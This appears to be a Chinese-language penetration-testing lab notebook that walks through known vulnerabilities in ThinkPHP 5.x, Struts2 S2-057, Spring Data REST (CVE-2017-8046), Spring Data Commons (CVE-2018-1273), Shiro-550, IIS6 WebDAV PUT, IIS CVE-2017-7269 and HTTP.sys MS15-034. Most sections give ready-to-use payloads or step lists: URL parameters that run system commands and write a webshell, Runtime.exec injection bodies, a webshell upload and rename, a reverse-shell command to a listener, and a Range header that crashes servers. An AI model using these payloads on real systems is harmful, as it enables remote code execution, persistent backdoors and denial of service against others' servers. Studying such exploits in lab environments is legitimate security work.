一、Thinkphp5x远程命令执行及getshell
1.进入环境页面
2.在地址栏后输入
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
执行远程代码执行
3.也可以执行
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
在网页查看phpinfo
4.进行getshell
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20"<?php%20phpinfo();?>"%20>>文件名
然后访问我们的文件
二、S2-057远程执行代码漏洞
1.搭建环境在地址栏后输入/struts2/showcase进入页面
2.在url处输入${(123+123)}/actionChain1.action后刷新可以看到中间数字位置相加了
3.将上面验证的payload值修改为我们的利用exp
三、Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)
1.搭建环境进入customers/1
2.打开burp抓包,将GET修改为PATCH,添加字段 Content-Type: application/json-patch+json,再将制作好的payload添加到最后一行
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]
3.进⼊docker容器内查看是否执⾏命令
四、spring 代码执⾏ (CVE-2018-1273)
1.搭建环境后输入/users
2.输入账号密码进行抓包
3.在最后一行添加字段,把原来username那条字段删除
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/xxx")]=&password=&repeatedPassword=
4.进⼊docker容器内查看是否执⾏命令
五、Shiro rememberMe反序列化漏洞(Shiro-550)
1.搭建环境进入登录页面
2.打开工具进行爆破
3.可以输入系统命令
六、IIS6 PUT漏洞
1.开启 WebDAV 和写权限
2.把来宾账户修改权限为完全控制
3.打开抓包上传一句话木马
4.可以看到我们的木马文件上传成功了
5.使⽤MOVE命令将其更名为脚本⽂档后缀
6.打开软件测试连接成功
六、IIS RCE-CVE-2017-7269
1.kali先开启一个监听端口
2.反弹shell
python2 iis6 shell文件+iis服务器IP+端口号+kaliIP+端口号
3.可以看到监听成功
七、HTTP.SYS远程代码执⾏(MS15-034)
1.编辑请求头,增加Range: bytes=0-18446744073709551615字段返回 416 存在此漏洞
2.可以造成⼀个ddos的效果
3.这时候就可以看到虚拟机已经变卡了,甚⾄蓝屏